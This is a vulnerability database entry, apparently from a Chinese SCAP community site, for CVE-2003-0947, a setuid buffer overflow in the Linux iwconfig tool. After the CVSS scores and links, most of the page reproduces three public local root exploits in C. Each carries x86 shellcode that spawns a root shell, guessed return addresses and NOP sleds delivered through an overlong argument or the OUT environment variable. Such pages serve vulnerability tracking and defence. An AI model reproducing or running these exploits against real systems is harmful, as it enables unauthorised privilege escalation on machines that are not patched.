CVE-2003-0947
CVSS 7.2
Published: 2003-12-15 00:00:00
Revised: 2016-10-17 22:38:27

[Original text] Buffer overflow in iwconfig, when installed setuid, allows local users to execute arbitrary code via a long OUT environment variable.


[CNNVD] iwconfig Buffer Overflow Vulnerability (CNNVD-200312-041)

        iwconfig contains a stack buffer overflow. When the binary is installed setuid, a local user can execute arbitrary code with the privileges of the binary's owner by supplying an overlong OUT environment variable. The public exploits listed further down trigger the same class of overflow through an overlong command-line argument as well as through the OUT variable.
        

- CVSS (base score)

CVSS score: 7.2 [HIGH]
Confidentiality impact: COMPLETE [total information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [can result in complete system shutdown]
Access complexity: LOW [no special access conditions required]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [no authentication required to exploit]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No matching OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0947
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0947
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200312-041
(official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=106867458902521&w=2
(UNKNOWN)  BUGTRAQ  20031112 iwconfig vulnerability - the last code was demaged sending by email

- Vulnerability information

iwconfig Buffer Overflow Vulnerability
High risk  Buffer overflow
2003-12-15 00:00:00 2005-10-20 00:00:00
Local
        iwconfig contains a buffer overflow. When the binary is installed setuid, a local user can execute arbitrary code with the privileges of the binary's owner by supplying an overlong OUT environment variable.
        

- Advisories and patches

        

- Vulnerability information (23299)

IWConfig Local ARGV Command Line Buffer Overflow Vulnerability (1) (EDBID:23299)
linux local
2003-10-27 Verified
0 axis
N/A
source: http://www.securityfocus.com/bid/8901/info

A problem has been identified in the iwconfig program when handling strings on the commandline. Because of this, a local attacker may be able to gain elevated privileges. 

Exploit:
/* PST_iwconfig
   /sbin/iwconfig proof of concept exploit
   coded by aXis@ph4nt0m.net
   Ph4nt0m Security Team
   http://www.ph4nt0m.net
   just for fun
*/

#include <stdio.h>
#include <string.h>   /* strlen, memset, memcpy */
#include <unistd.h>   /* execve */

/* Copyright (c) Ramon de Carvalho Valle July 2003 */
/* x86/linux shellcode */

char shellcode[]= /* 24 bytes */
    "\x31\xc0" /* xorl %eax,%eax */
    "\x50" /* pushl %eax */
    "\x68\x2f\x2f\x73\x68" /* pushl $0x68732f2f */
    "\x68\x2f\x62\x69\x6e" /* pushl $0x6e69622f */
    "\x89\xe3" /* movl %esp,%ebx */
    "\x50" /* pushl %eax */
    "\x53" /* pushl %ebx */
    "\x89\xe1" /* movl %esp,%ecx */
    "\x99" /* cltd */
    "\xb0\x0b" /* movb $0x0b,%al */
    "\xcd\x80"; /* int $0x80 */


int main(int argc,char **argv){
   char buf[97];            /* 96 payload bytes plus a NUL so argv[1] is a proper C string */
   unsigned long ret;

   char *prog[]={"/sbin/iwconfig",buf,NULL};
   /* the shellcode travels in the environment, so on a 32-bit Linux stack
      without ASLR its address is predictable just below 0xc0000000 */
   char *env[]={"HOME=/",shellcode,NULL};

   /* estimated address of the shellcode string at the top of the stack */
   ret=0xc0000000-strlen(shellcode)-strlen(prog[0])-0x06;
   printf("use ret addr: 0x%lx\n",ret);

   memset(buf,0x41,96);     /* 92 bytes of 'A' padding ...                    */
   memcpy(&buf[92],&ret,4); /* ... then the return address at offset 92 (32-bit) */
   buf[96]='\0';

   execve(prog[0],prog,env);
   perror("execve");        /* only reached if the target could not be started */
   return 1;
  }
		

- Vulnerability information (23300)

IWConfig Local ARGV Command Line Buffer Overflow Vulnerability (2) (EDBID:23300)
linux local
2003-11-11 Verified
0 heka
N/A
source: http://www.securityfocus.com/bid/8901/info
 
A problem has been identified in the iwconfig program when handling strings on the commandline. Because of this, a local attacker may be able to gain elevated privileges. 

/*
  Name: iw-config.c
  Copyright: !sh2k+!tc2k
  Author: heka
  Date: 11/11/2003
  Greets: bx, pintos, eksol, hex, keyhook, grass, toolman, rD, shellcode, dunric, termid, kewlcat, JiNKS
  Description: /sbin/iwconfig - local root exploit
  iwconfig manipulate the basic wireless parameters

*/

#include <stdio.h>
#include <stdlib.h>     /* putenv */
#include <string.h>     /* memset, memcpy, strlen */
#include <unistd.h>     /* execl */

#define BIN     "/sbin/iwconfig"

unsigned char shellcode[] =
                  "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x31\xc0\xb0\x2e"
                  "\xcd\x80\x31\xc0\x53\x68\x77\x30\x30\x74\x89\xe3"
                  "\xb0\x27\xcd\x80\x31\xc0\xb0\x3d\xcd\x80\x31\xc0"
                  "\x31\xdb\x31\xc9\xb1\x0a\x50\x68\x2e\x2e\x2f\x2f"
                  "\xe2\xf9\x89\xe3\xb0\x0c\xcd\x80\x31\xc0\x31\xdb"
                  "\x6a\x2e\x89\xe3\xb0\x3d\xcd\x80\x31\xc0\x31\xdb"
                  "\x31\xc9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
                  "\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd"
                  "\x80\x31\xc0\x31\xdb\xb0\x01\xcd\x80";

int
main ()
{
   int x;
   char buf[97], out[1337], *buffer;
   /* 32-bit build assumed: unsigned long is 4 bytes, one address per write */
   unsigned long ret_add = 0xbffffbb8, *add_ptr ;
   buffer = buf;
   add_ptr = (unsigned long *)buffer;
   /* argv[1]: 24 copies of the guessed return address (96 bytes) */
   for (x=0; x<97-1; x+=4)
   *(add_ptr++)=ret_add;
   buf[96] = '\0';          /* terminate so execl() passes exactly 96 bytes */
   /* OUT=<NOP sled><shellcode><NOP sled>, handed over in the environment */
   memset ((char *)out, 0x90, 1337);
   memcpy ((char *)out + 333, shellcode, strlen((char *)shellcode));
   memcpy((char *)out, "OUT=", 4);
   out[1336] = '\0';        /* terminate the environment string */
   putenv(out);
   execl (BIN, BIN, buf, (char *)NULL);
   perror("execl");         /* only reached if the target could not be started */
   return 0;
}

		

- Vulnerability information (23301)

IWConfig Local ARGV Command Line Buffer Overflow Vulnerability (3) (EDBID:23301)
linux local
2003-10-27 Verified
0 NrAziz
N/A
source: http://www.securityfocus.com/bid/8901/info
  
A problem has been identified in the iwconfig program when handling strings on the commandline. Because of this, a local attacker may be able to gain elevated privileges. 

/*
 * (C) 2003 NrAziz
 * polygrithm_at_hotmail[DOT]com
 */

/*
 * Greetz to Mixter,gorny,rave..
 */

/*
 * Description:
 *              iwconfig configures a wireless network interface and is similar to ifconfig
 *  except that iwconfig configures wireless interfaces.
 * Vulnerability:
 *               Instead of giving the interface parameter when a large string is given
 * the buffer overflows :-)...
 */

/*
 * Yet another Proof Of Concept Xploit for 'iwconfig'
 */


#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* strlen, memcpy */
#include <unistd.h>   /* execl */

#define BUFF_SIZE 98
#define RET 0xbffffc3f

char shellcode[]=
"\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d"
"\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58";

int main(int argc,char **argv)
{

  int i;
  /* BUFF_SIZE+4: the last 4-byte RET write starts at offset 96, and one
     more byte is needed for the terminating NUL */
  char *buff=(char *)malloc(BUFF_SIZE+4);
  if(buff==NULL)
    return 1;

  /* 32-bit build assumed (long is 4 bytes): fill with the guessed return address */
  for(i=0;i<BUFF_SIZE;i+=4)
    *(long *)&buff[i]=RET;

  /* NOP sled, then the shellcode, leaving the trailing RET copies in place */
  for(i=0;i<BUFF_SIZE-strlen(shellcode)-12;i++)
    *(buff+i)=0x90;

  memcpy(buff+i,shellcode,strlen(shellcode));
  buff[BUFF_SIZE]='\0';   /* argv[1] is exactly BUFF_SIZE bytes */

  execl("/sbin/iwconfig","iwconfig",buff,(char *)NULL);
  perror("execl");        /* only reached if the target could not be started */

  return 0;
}
		

- Vulnerability information

11752
iwconfig Long Multiple Environment Variable Local Overflow
Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

Unknown or Incomplete

- Timeline

2003-10-27 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- References

- Vulnerability author

Unknown or Incomplete
 

 

About the SCAP Chinese Community

The SCAP Chinese Community is the first Chinese-language open community in China devoted to SCAP. For more information, see the About page.

Copyright notice

CVE, CWE and OVAL are registered trademarks of the MITRE Corporation; their official data sources are kept on MITRE's websites.